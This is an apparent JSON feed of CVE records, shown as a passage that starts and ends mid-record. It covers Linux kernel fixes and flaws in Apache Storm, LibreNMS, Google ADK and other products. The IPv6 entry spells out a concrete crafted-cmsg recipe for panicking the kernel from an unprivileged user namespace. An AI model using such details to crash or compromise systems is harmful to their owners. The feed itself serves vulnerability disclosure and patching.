and\nrelease it directly instead of shrinking it further.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00024,"ranking_epss":0.066,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://git.kernel.org/stable/c/68ca0eea0af02bed36c5e2c13e9fa1647c31a7d4","https://git.kernel.org/stable/c/6cea34d7ec6829b62f521a37a287f670144a2233","https://git.kernel.org/stable/c/9862ef9ab0a116c6dca98842aab7de13a252ae02","https://git.kernel.org/stable/c/ad92ee87462f9a3061361d392e9dbfe2e5c1c9fb","https://git.kernel.org/stable/c/b7eef00f08b92b0b9efe8ae0df6d0005e6199323","https://git.kernel.org/stable/c/ceacaa76f221a6577aba945bb8873c2e640aeba4"],"published_time":"2026-04-13T14:16:11","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31419","summary":"In the Linux kernel, the following vulnerability has been resolved:\n\nnet: bonding: fix use-after-free in bond_xmit_broadcast()\n\nbond_xmit_broadcast() reuses the original skb for the last slave\n(determined by bond_is_last_slave()) and clones it for others.\nConcurrent slave enslave/release can mutate the slave list during\nRCU-protected iteration, changing which slave is \"last\" mid-loop.\nThis causes the original skb to be double-consumed (double-freed).\n\nReplace the racy bond_is_last_slave() check with a simple index\ncomparison (i + 1 == slaves_count) against the pre-snapshot slave\ncount taken via READ_ONCE() before the loop.  This preserves the\nzero-copy optimization for the last slave while making the \"last\"\ndetermination stable against concurrent list mutations.\n\nThe UAF can trigger the following crash:\n\n==================================================================\nBUG: KASAN: slab-use-after-free in skb_clone\nRead of size 8 at addr ffff888100ef8d40 by task exploit/147\n\nCPU: 1 UID: 0 PID: 147 Comm: exploit Not tainted 7.0.0-rc3+ #4 PREEMPTLAZY\nCall Trace:\n <TASK>\n dump_stack_lvl (lib/dump_stack.c:123)\n print_report (mm/kasan/report.c:379 mm/kasan/report.c:482)\n kasan_report (mm/kasan/report.c:597)\n skb_clone (include/linux/skbuff.h:1724 include/linux/skbuff.h:1792 include/linux/skbuff.h:3396 net/core/skbuff.c:2108)\n bond_xmit_broadcast (drivers/net/bonding/bond_main.c:5334)\n bond_start_xmit (drivers/net/bonding/bond_main.c:5567 drivers/net/bonding/bond_main.c:5593)\n dev_hard_start_xmit (include/linux/netdevice.h:5325 include/linux/netdevice.h:5334 net/core/dev.c:3871 net/core/dev.c:3887)\n __dev_queue_xmit (include/linux/netdevice.h:3601 net/core/dev.c:4838)\n ip6_finish_output2 (include/net/neighbour.h:540 include/net/neighbour.h:554 net/ipv6/ip6_output.c:136)\n ip6_finish_output (net/ipv6/ip6_output.c:208 net/ipv6/ip6_output.c:219)\n ip6_output (net/ipv6/ip6_output.c:250)\n ip6_send_skb (net/ipv6/ip6_output.c:1985)\n udp_v6_send_skb (net/ipv6/udp.c:1442)\n udpv6_sendmsg (net/ipv6/udp.c:1733)\n __sys_sendto (net/socket.c:730 net/socket.c:742 net/socket.c:2206)\n __x64_sys_sendto (net/socket.c:2209)\n do_syscall_64 (arch/x86/entry/syscall_64.c:63 arch/x86/entry/syscall_64.c:94)\n entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)\n </TASK>\n\nAllocated by task 147:\n\nFreed by task 147:\n\nThe buggy address belongs to the object at ffff888100ef8c80\n which belongs to the cache skbuff_head_cache of size 224\nThe buggy address is located 192 bytes inside of\n freed 224-byte region [ffff888100ef8c80, ffff888100ef8d60)\n\nMemory state around the buggy address:\n ffff888100ef8c00: fb fb fb fb fc fc fc fc fc fc fc fc fc fc fc fc\n ffff888100ef8c80: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\n>ffff888100ef8d00: fb fb fb fb fb fb fb fb fb fb fb fb fc fc fc fc\n                                                    ^\n ffff888100ef8d80: fc fc fc fc fc fc fc fc fa fb fb fb fb fb fb fb\n ffff888100ef8e00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\n==================================================================","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00017,"ranking_epss":0.03894,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://git.kernel.org/stable/c/2884bf72fb8f03409e423397319205de48adca16","https://git.kernel.org/stable/c/d4cc7e4c80b1634c7b1497574a2fdb18df6c026c","https://git.kernel.org/stable/c/f5b94654a4a19891a8108d66ef166de6c028c6cd"],"published_time":"2026-04-13T14:16:11","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31420","summary":"In the Linux kernel, the following vulnerability has been resolved:\n\nbridge: mrp: reject zero test interval to avoid OOM panic\n\nbr_mrp_start_test() and br_mrp_start_in_test() accept the user-supplied\ninterval value from netlink without validation. When interval is 0,\nusecs_to_jiffies(0) yields 0, causing the delayed work\n(br_mrp_test_work_expired / br_mrp_in_test_work_expired) to reschedule\nitself with zero delay. This creates a tight loop on system_percpu_wq\nthat allocates and transmits MRP test frames at maximum rate, exhausting\nall system memory and causing a kernel panic via OOM deadlock.\n\nThe same zero-interval issue applies to br_mrp_start_in_test_parse()\nfor interconnect test frames.\n\nUse NLA_POLICY_MIN(NLA_U32, 1) in the nla_policy tables for both\nIFLA_BRIDGE_MRP_START_TEST_INTERVAL and\nIFLA_BRIDGE_MRP_START_IN_TEST_INTERVAL, so zero is rejected at the\nnetlink attribute parsing layer before the value ever reaches the\nworkqueue scheduling code. This is consistent with how other bridge\nsubsystems (br_fdb, br_mst) enforce range constraints on netlink\nattributes.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00021,"ranking_epss":0.05646,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://git.kernel.org/stable/c/c9bc352f716d1bebfe43354bce539ec2d0223b30","https://git.kernel.org/stable/c/fa6e24963342de4370e3a3c9af41e38277b74cf3"],"published_time":"2026-04-13T14:16:11","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31421","summary":"In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: cls_fw: fix NULL pointer dereference on shared blocks\n\nThe old-method path in fw_classify() calls tcf_block_q() and\ndereferences q->handle.  Shared blocks leave block->q NULL, causing a\nNULL deref when an empty cls_fw filter is attached to a shared block\nand a packet with a nonzero major skb mark is classified.\n\nReject the configuration in fw_change() when the old method (no\nTCA_OPTIONS) is used on a shared block, since fw_classify()'s\nold-method path needs block->q which is NULL for shared blocks.\n\nThe fixed null-ptr-deref calling stack:\n KASAN: null-ptr-deref in range [0x0000000000000038-0x000000000000003f]\n RIP: 0010:fw_classify (net/sched/cls_fw.c:81)\n Call Trace:\n  tcf_classify (./include/net/tc_wrapper.h:197 net/sched/cls_api.c:1764 net/sched/cls_api.c:1860)\n  tc_run (net/core/dev.c:4401)\n  __dev_queue_xmit (net/core/dev.c:4535 net/core/dev.c:4790)","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00024,"ranking_epss":0.066,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://git.kernel.org/stable/c/18328eff2f97d1a6adcdb6d4a0f42f2f83a31e28","https://git.kernel.org/stable/c/3cb055df9e8625ce699a259d8178d67b37f2b160","https://git.kernel.org/stable/c/3d41f9a314afa94b1c7c7c75405920123220e8cd","https://git.kernel.org/stable/c/5cf41031922c154aa5ccda8bcdb0f5e6226582ec","https://git.kernel.org/stable/c/96426c348def662b06bfdc65be3002905604927a","https://git.kernel.org/stable/c/faeea8bbf6e958bf3c00cb08263109661975987c"],"published_time":"2026-04-13T14:16:11","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31422","summary":"In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: cls_flow: fix NULL pointer dereference on shared blocks\n\nflow_change() calls tcf_block_q() and dereferences q->handle to derive\na default baseclass.  Shared blocks leave block->q NULL, causing a NULL\nderef when a flow filter without a fully qualified baseclass is created\non a shared block.\n\nCheck tcf_block_shared() before accessing block->q and return -EINVAL\nfor shared blocks.  This avoids the null-deref shown below:\n\n=======================================================================\nKASAN: null-ptr-deref in range [0x0000000000000038-0x000000000000003f]\nRIP: 0010:flow_change (net/sched/cls_flow.c:508)\nCall Trace:\n tc_new_tfilter (net/sched/cls_api.c:2432)\n rtnetlink_rcv_msg (net/core/rtnetlink.c:6980)\n [...]\n=======================================================================","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00024,"ranking_epss":0.066,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://git.kernel.org/stable/c/1a280dd4bd1d616a01d6ffe0de284c907b555504","https://git.kernel.org/stable/c/415ea0c973c754b9f375225807810eb9045f4293","https://git.kernel.org/stable/c/4a09f72007201c9f667dc47f64517ec23eea65e5","https://git.kernel.org/stable/c/9bf5fc36a43f7b8b5507c96e74fb81f1e8b4957e","https://git.kernel.org/stable/c/a208c3e1232997e9317887294c20008dfcb75449","https://git.kernel.org/stable/c/cc707a4fd4c3b6ab2722e06bc359aa010e13d408"],"published_time":"2026-04-13T14:16:11","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31414","summary":"In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_conntrack_expect: use expect->helper\n\nUse expect->helper in ctnetlink and /proc to dump the helper name.\nUsing nfct_help() without holding a reference to the master conntrack\nis unsafe.\n\nUse exp->master->helper in ctnetlink path if userspace does not provide\nan explicit helper when creating an expectation to retain the existing\nbehaviour. The ctnetlink expectation path holds the reference on the\nmaster conntrack and nf_conntrack_expect lock and the nfnetlink glue\npath refers to the master ct that is attached to the skb.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00024,"ranking_epss":0.066,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://git.kernel.org/stable/c/3dfd3f7712b5a800f2ba632179e9b738076a51f0","https://git.kernel.org/stable/c/4bd1b3d839172724b33d8d02c5a4ff6a1c775417","https://git.kernel.org/stable/c/847cb7fe26c5ce5dce0d1a41fac1ea488b7f1781","https://git.kernel.org/stable/c/b53294bff19e56ada2f230ceb8b1ffde61cc3817","https://git.kernel.org/stable/c/e7ccaa0a62a8ff2be5d521299ce79390c318d306","https://git.kernel.org/stable/c/f01794106042ee27e54af6fdf5b319a2fe3df94d"],"published_time":"2026-04-13T14:16:10","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31415","summary":"In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: avoid overflows in ip6_datagram_send_ctl()\n\nYiming Qian reported :\n<quote>\n I believe I found a locally triggerable kernel bug in the IPv6 sendmsg\n ancillary-data path that can panic the kernel via `skb_under_panic()`\n (local DoS).\n\n The core issue is a mismatch between:\n\n - a 16-bit length accumulator (`struct ipv6_txoptions::opt_flen`, type\n `__u16`) and\n - a pointer to the *last* provided destination-options header (`opt->dst1opt`)\n\n when multiple `IPV6_DSTOPTS` control messages (cmsgs) are provided.\n\n - `include/net/ipv6.h`:\n   - `struct ipv6_txoptions::opt_flen` is `__u16` (wrap possible).\n (lines 291-307, especially 298)\n - `net/ipv6/datagram.c:ip6_datagram_send_ctl()`:\n   - Accepts repeated `IPV6_DSTOPTS` and accumulates into `opt_flen`\n without rejecting duplicates. (lines 909-933)\n - `net/ipv6/ip6_output.c:__ip6_append_data()`:\n   - Uses `opt->opt_flen + opt->opt_nflen` to compute header\n sizes/headroom decisions. (lines 1448-1466, especially 1463-1465)\n - `net/ipv6/ip6_output.c:__ip6_make_skb()`:\n   - Calls `ipv6_push_frag_opts()` if `opt->opt_flen` is non-zero.\n (lines 1930-1934)\n - `net/ipv6/exthdrs.c:ipv6_push_frag_opts()` / `ipv6_push_exthdr()`:\n   - Push size comes from `ipv6_optlen(opt->dst1opt)` (based on the\n pointed-to header). (lines 1179-1185 and 1206-1211)\n\n 1. `opt_flen` is a 16-bit accumulator:\n\n - `include/net/ipv6.h:298` defines `__u16 opt_flen; /* after fragment hdr */`.\n\n 2. `ip6_datagram_send_ctl()` accepts *repeated* `IPV6_DSTOPTS` cmsgs\n and increments `opt_flen` each time:\n\n - In `net/ipv6/datagram.c:909-933`, for `IPV6_DSTOPTS`:\n   - It computes `len = ((hdr->hdrlen + 1) << 3);`\n   - It checks `CAP_NET_RAW` using `ns_capable(net->user_ns,\n CAP_NET_RAW)`. (line 922)\n   - Then it does:\n     - `opt->opt_flen += len;` (line 927)\n     - `opt->dst1opt = hdr;` (line 928)\n\n There is no duplicate rejection here (unlike the legacy\n `IPV6_2292DSTOPTS` path which rejects duplicates at\n `net/ipv6/datagram.c:901-904`).\n\n If enough large `IPV6_DSTOPTS` cmsgs are provided, `opt_flen` wraps\n while `dst1opt` still points to a large (2048-byte)\n destination-options header.\n\n In the attached PoC (`poc.c`):\n\n - 32 cmsgs with `hdrlen=255` => `len = (255+1)*8 = 2048`\n - 1 cmsg with `hdrlen=0` => `len = 8`\n - Total increment: `32*2048 + 8 = 65544`, so `(__u16)opt_flen == 8`\n - The last cmsg is 2048 bytes, so `dst1opt` points to a 2048-byte header.\n\n 3. The transmit path sizes headers using the wrapped `opt_flen`:\n\n- In `net/ipv6/ip6_output.c:1463-1465`:\n  - `headersize = sizeof(struct ipv6hdr) + (opt ? opt->opt_flen +\n opt->opt_nflen : 0) + ...;`\n\n With wrapped `opt_flen`, `headersize`/headroom decisions underestimate\n what will be pushed later.\n\n 4. When building the final skb, the actual push length comes from\n `dst1opt` and is not limited by wrapped `opt_flen`:\n\n - In `net/ipv6/ip6_output.c:1930-1934`:\n   - `if (opt->opt_flen) proto = ipv6_push_frag_opts(skb, opt, proto);`\n - In `net/ipv6/exthdrs.c:1206-1211`, `ipv6_push_frag_opts()` pushes\n `dst1opt` via `ipv6_push_exthdr()`.\n - In `net/ipv6/exthdrs.c:1179-1184`, `ipv6_push_exthdr()` does:\n   - `skb_push(skb, ipv6_optlen(opt));`\n   - `memcpy(h, opt, ipv6_optlen(opt));`\n\n With insufficient headroom, `skb_push()` underflows and triggers\n `skb_under_panic()` -> `BUG()`:\n\n - `net/core/skbuff.c:2669-2675` (`skb_push()` calls `skb_under_panic()`)\n - `net/core/skbuff.c:207-214` (`skb_panic()` ends in `BUG()`)\n\n - The `IPV6_DSTOPTS` cmsg path requires `CAP_NET_RAW` in the target\n netns user namespace (`ns_capable(net->user_ns, CAP_NET_RAW)`).\n - Root (or any task with `CAP_NET_RAW`) can trigger this without user\n namespaces.\n - An unprivileged `uid=1000` user can trigger this if unprivileged\n user namespaces are enabled and it can create a userns+netns to obtain\n namespaced `CAP_NET_RAW` (the attached PoC does this).\n\n - Local denial of service: kernel BUG/panic (system crash).\n -\n---truncated---","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.0003,"ranking_epss":0.08473,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://git.kernel.org/stable/c/0bdaf54d3aaddfe8df29371260fa8d4939b4fd6f","https://git.kernel.org/stable/c/4e453375561fc60820e6b9d8ebeb6b3ee177d42e","https://git.kernel.org/stable/c/5e4ee5dbea134e9257f205e31a96040bed71e83f","https://git.kernel.org/stable/c/63fda74885555e6bd1623b5d811feec998740ba4","https://git.kernel.org/stable/c/872b74900d5daa37067ac676d9001bb929fc6a2a","https://git.kernel.org/stable/c/9ed81d692758dfb9471d7799b24bfa7a08224c31"],"published_time":"2026-04-13T14:16:10","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31416","summary":"In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nfnetlink_log: account for netlink header size\n\nThis is a followup to an old bug fix: NLMSG_DONE needs to account\nfor the netlink header size, not just the attribute size.\n\nThis can result in a WARN splat + drop of the netlink message,\nbut other than this there are no ill effects.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00024,"ranking_epss":0.066,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://git.kernel.org/stable/c/607245c4dbb86d9a10dd8388da0fb82170a99b61","https://git.kernel.org/stable/c/6b419700e459fbf707ca1543b7c1b57a60fedb73","https://git.kernel.org/stable/c/6d52a4a0520a6696bdde51caa11f2d6821cd0c01","https://git.kernel.org/stable/c/761b45c661af48da6a065868d59ab1e1f64fd9b6","https://git.kernel.org/stable/c/88a8f56e6276f616baad4274c6b8e4683e26e520","https://git.kernel.org/stable/c/f08ffa3e1c8e36b6131f69c5eb23700c28cbd262"],"published_time":"2026-04-13T14:16:10","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-36922","summary":"Sourcecodester Cab Management System v1.0 is vulnerable to SQL injection in the file /cms/admin/categories/view_category.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":0.00021,"ranking_epss":0.05688,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/hubdk01/bug_report/blob/main/Sourcecodester/cab-management-system/SQL-1.md"],"published_time":"2026-04-13T13:16:42","vendor":"oretnom23","product":"cab_management_system","version":null},{"cve_id":"CVE-2026-36923","summary":"Sourcecodester Cab Management System 1.0 is vulnerable to SQL Injection in the file /cms/admin/bookings/view_booking.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":0.00021,"ranking_epss":0.05688,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/hubdk01/bug_report/blob/main/Sourcecodester/cab-management-system/SQL-2.md"],"published_time":"2026-04-13T13:16:42","vendor":"oretnom23","product":"cab_management_system","version":null},{"cve_id":"CVE-2026-36872","summary":"Sourcecodester Basic Library System v1.0 is vulnerable to SQL Injection in /librarysystem/load_book.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":0.00021,"ranking_epss":0.05688,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Thirtypenny77/bug_report/blob/main/sourcecodester/basic-library-system/SQL-1.md"],"published_time":"2026-04-13T13:16:41","vendor":"razormist","product":"basic_library_system","version":null},{"cve_id":"CVE-2026-36873","summary":"Sourcecodester Basic Library System v1.0 is vulnerable to SQL Injection in /librarysystem/load_admin.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":0.00021,"ranking_epss":0.05688,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Thirtypenny77/bug_report/blob/main/sourcecodester/basic-library-system/SQL-2.md"],"published_time":"2026-04-13T13:16:41","vendor":"razormist","product":"basic_library_system","version":null},{"cve_id":"CVE-2026-36874","summary":"Sourcecodester Basic Library System v1.0 is vulnerable to SQL Injection in /librarysystem/load_student.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":0.0002,"ranking_epss":0.0535,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Thirtypenny77/bug_report/blob/main/sourcecodester/basic-library-system/SQL-3.md"],"published_time":"2026-04-13T13:16:41","vendor":"razormist","product":"basic_library_system","version":null},{"cve_id":"CVE-2026-36919","summary":"Sourcecodester Online Reviewer System v1.0 is vulnerale to SQL Injection in the file /system/system/admins/assessments/examproper/exam-update.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":0.0002,"ranking_epss":0.05333,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/hubdk01/bug_report/blob/main/Sourcecodester/online-reviewer-system/SQL-2.md"],"published_time":"2026-04-13T13:16:41","vendor":"janobe","product":"online_reviewer_system","version":null},{"cve_id":"CVE-2026-36920","summary":"Sourcecodester Online Reviewer System v1.0 is vulnerable to SQL Injection in the file /system/system/admins/assessments/examproper/questions-view.php.","cvss":2.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.7,"cvss_v4":null,"epss":0.0002,"ranking_epss":0.05333,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/hubdk01/bug_report/blob/main/Sourcecodester/online-reviewer-system/SQL-1.md"],"published_time":"2026-04-13T13:16:41","vendor":"janobe","product":"online_reviewer_system","version":null},{"cve_id":"CVE-2026-34476","summary":"Server-Side Request Forgery via SW-URL Header vulnerability in Apache SkyWalking MCP.\n\nThis issue affects Apache SkyWalking MCP: 0.1.0.\n\nUsers are recommended to upgrade to version 0.2.0, which fixes this issue.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":0.00028,"ranking_epss":0.07905,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://lists.apache.org/thread/v0k1xyzzbtnpyrwxwyn36pbspr8rhjnr","http://www.openwall.com/lists/oss-security/2026/04/13/4"],"published_time":"2026-04-13T13:16:40","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6204","summary":"LibreNMS versions before 26.3.0 are affected by an authenticated remote code execution vulnerability by abusing the Binary Locations config and the Netcommand feature. Successful exploitation requires administrative privileges. Exploitation could result in compromise of the underlying web server.","cvss":8.5,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":8.5,"epss":6e-05,"ranking_epss":0.00303,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/librenms/librenms/security/advisories/GHSA-pr3g-phhr-h8fh","https://projectblack.io/blog/librenms-authenticated-rce-and-xss/#binary-path-rce-poc"],"published_time":"2026-04-13T11:16:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-2728","summary":"LibreNMS versions before 26.3.0 are affected by an authenticated Cross-site Scripting vulnerability on the showconfig page. Successful exploitation requires administrative privileges. Exploitation could result in XSS attacks being performed against other users with access to the page.","cvss":4.6,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":4.6,"epss":2e-05,"ranking_epss":0.00041,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://projectblack.io/blog/librenms-authenticated-rce-and-xss/#xss-on-showconfig-page-2630"],"published_time":"2026-04-13T11:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35337","summary":"Deserialization of Untrusted Data vulnerability in Apache Storm.\n\nVersions Affected:\nbefore 2.8.6.\n\n\nDescription:\nWhen processing topology credentials submitted via the Nimbus Thrift API, Storm deserializes the base64-encoded TGT blob using ObjectInputStream.readObject() without any class filtering or validation. An authenticated user with topology submission rights could supply a crafted serialized object in the \"TGT\" credential field, leading to remote code execution in both the Nimbus and Worker JVMs.\n\n\nMitigation:\n2.x users should upgrade to 2.8.6.\n\n\nUsers who cannot upgrade immediately should monkey-patch an ObjectInputFilter allow-list to ClientAuthUtils.deserializeKerberosTicket() restricting deserialized classes to javax.security.auth.kerberos.KerberosTicket and its known dependencies. A guide on how to do this is available in the release notes of 2.8.6.\n\nCredit: This issue was discovered by K.","cvss":8.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":null,"epss":0.00416,"ranking_epss":0.61705,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://storm.apache.org/2026/04/12/storm286-released.html","http://www.openwall.com/lists/oss-security/2026/04/12/6"],"published_time":"2026-04-13T10:16:11","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35565","summary":"Stored Cross-Site Scripting (XSS) via Unsanitized Topology Metadata in Apache Storm UI\n\n\nVersions Affected: before 2.8.6\n\n\nDescription: The Storm UI visualization component interpolates topology metadata including component IDs, stream names, and grouping values directly into HTML via innerHTML in parseNode() and parseEdge() without sanitization at any layer. An authenticated user with topology submission rights could craft a topology containing malicious HTML/JavaScript in component identifiers (e.g., a bolt ID containing an onerror event handler). This payload flows through Nimbus → Thrift → the Visualization API → vis.js tooltip rendering, resulting in stored cross-site scripting. \n\nIn multi-tenant deployments where topology submission is available to less-trusted users but the UI is accessed by operators or administrators, this enables privilege escalation through script execution in an admin's browser session.\n\n\nMitigation: 2.x users should upgrade to 2.8.6. Users who cannot upgrade immediately should monkey-patch the parseNode() and parseEdge() functions in the visualization JavaScript file to HTML-escape all API-supplied values including nodeId, :capacity, :latency, :component, :stream, and :grouping before interpolation into tooltip HTML strings, and should additionally restrict topology submission to trusted users via Nimbus ACLs as a defense-in-depth measure. A guide on how to do this is available in the release notes of 2.8.6.\n\nCredit: This issue was discovered while investigating another report by K.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":0.00033,"ranking_epss":0.09347,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://storm.apache.org/2026/04/12/storm286-released.html","http://www.openwall.com/lists/oss-security/2026/04/12/7"],"published_time":"2026-04-13T10:16:11","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-15632","summary":"A vulnerability has been found in 1Panel-dev MaxKB up to 2.4.2. Impacted is an unknown function of the file ui/src/chat.ts of the component MdPreview. Such manipulation leads to cross site scripting. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 2.5.0 is recommended to address this issue. The name of the patch is 7230daa5ec3e6574b6ede83dd48a4fbc0e70b8d8. It is advisable to upgrade the affected component. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product.","cvss":5.1,"cvss_version":4.0,"cvss_v2":4.0,"cvss_v3":3.5,"cvss_v4":5.1,"epss":0.00033,"ranking_epss":0.09303,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/1Panel-dev/MaxKB/","https://github.com/1Panel-dev/MaxKB/commit/7230daa5ec3e6574b6ede83dd48a4fbc0e70b8d8","https://github.com/1Panel-dev/MaxKB/pull/4578","https://github.com/1Panel-dev/MaxKB/releases/tag/v2.5.0","https://github.com/AnalogyC0de/public_exp/issues/28","https://vuldb.com/submit/782265","https://vuldb.com/vuln/356967","https://vuldb.com/vuln/356967/cti"],"published_time":"2026-04-13T10:16:10","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4810","summary":"A Code Injection and Missing Authentication vulnerability in Google Agent Development Kit (ADK) versions 1.7.0 (and 2.0.0a1) through 1.28.1 (and 2.0.0a2) on Python (OSS), Cloud Run, and GKE allows an unauthenticated remote attacker to execute arbitrary code on the server hosting the ADK instance.\n\nThis vulnerability was patched in versions 1.28.1 and 2.0.0a2.\n\n\nCustomers need to redeploy the upgraded ADK to their production environments. In addition, if they are running ADK Web locally, they also need to upgrade their local instance.","cvss":9.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":9.3,"epss":0.00295,"ranking_epss":0.52835,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/google/adk-python/blob/main/CHANGELOG.md#1274-2026-03-26"],"published_time":"2026-04-13T09:16:08","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-0233","summary":"A certificate validation vulnerability in Palo Alto Networks Autonomous Digital Experience Manager on Windows allows an unauthenticated attacker with adjacent network access to execute arbitrary code with NT AUTHORITY\\SYSTEM  privileges.","cvss":2.0,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":2.0,"epss":0.0001,"ranking_epss":0.01123,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://security.paloaltonetworks.com/CVE-2026-0233"],"published_time":"2026-04-13T08:16:22","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-0234","summary":"An improper verification of cryptographic signature vulnerability exists in Cortex XSOAR and Cortex XSIAM platforms during integration of Microsoft Teams that enables an unauthenticated user to access and modify protected resources.","cvss":7.2,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":7.2,"epss":0.00027,"ranking_epss":0.07353,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://security.paloaltonetworks.com/CVE-2026-0234"],"published_time":"2026-04-13T08:16:22","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-0232","summary":"A problem with a protection mechanism in the Palo Alto Networks Cortex XDR agent on Windows allows a local Windows administrator to disable the agent. This issue may be leveraged by malware to perform malicious activity without detection.","cvss":4.0,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":4.0,"epss":0.00013,"ranking_epss":0.02124,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://security.paloaltonetworks.com/CVE-2026-0232"],"published_time":"2026-04-13T08:16:20","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6167","summary":"A vulnerability was detected in code-projects Faculty Management System 1.0. Impacted is an unknown function of the file /subject-print.php. The manipulation of the argument ID results in sql injection. The attack may be launched remotely. The exploit is now public and may be used.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.0003,"ranking_epss":0.08446,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/wfcht-sy/src/issues/1","https://vuldb.com/submit/797098","https://vuldb.com/vuln/357055","https://vuldb.com/vuln/357055/cti"],"published_time":"2026-04-13T07:16:51","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6168","summary":"A flaw has been found in TOTOLINK A7000R up to 9.1.0u.6115. The affected element is the function setWiFiEasyGuestCfg of the file /cgi-bin/cstecgi.cgi. This manipulation of the argument ssid5g causes stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been published and may be 